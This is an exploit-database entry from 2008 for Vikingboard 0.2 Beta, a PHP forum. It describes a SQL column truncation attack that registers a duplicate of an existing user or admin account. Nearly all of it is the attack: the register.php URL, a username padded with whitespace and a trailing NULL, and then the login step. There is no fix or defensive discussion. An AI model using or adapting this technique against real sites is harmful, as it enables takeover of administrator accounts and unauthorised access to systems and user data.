Vikingboard 0.2 Beta - SQL Column Truncation

EDB-ID:

6569

CVE:



Author:

StAkeR

Type:

webapps


Platform:

PHP

Date:

2008-09-25


---------------------------------------------------------------------
 Vikingboard <= 0.2 Beta SQL Column Truncation
---------------------------------------------------------------------
 Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
 Discovered On: 25/09/2008
---------------------------------------------------------------------
 You Can Register An User\Admin That Already Exists!
---------------------------------------------------------------------
 URL: upload/register.php
 
 Username: [username]                                            NULL
 Password: [password]
 E-Mail:   [E-Mail]
---------------------------------------------------------------------
 URL: upload/login.php
 
 Username: [username]
 Password: [password]
---------------------------------------------------------------------

# milw0rm.com [2008-09-25]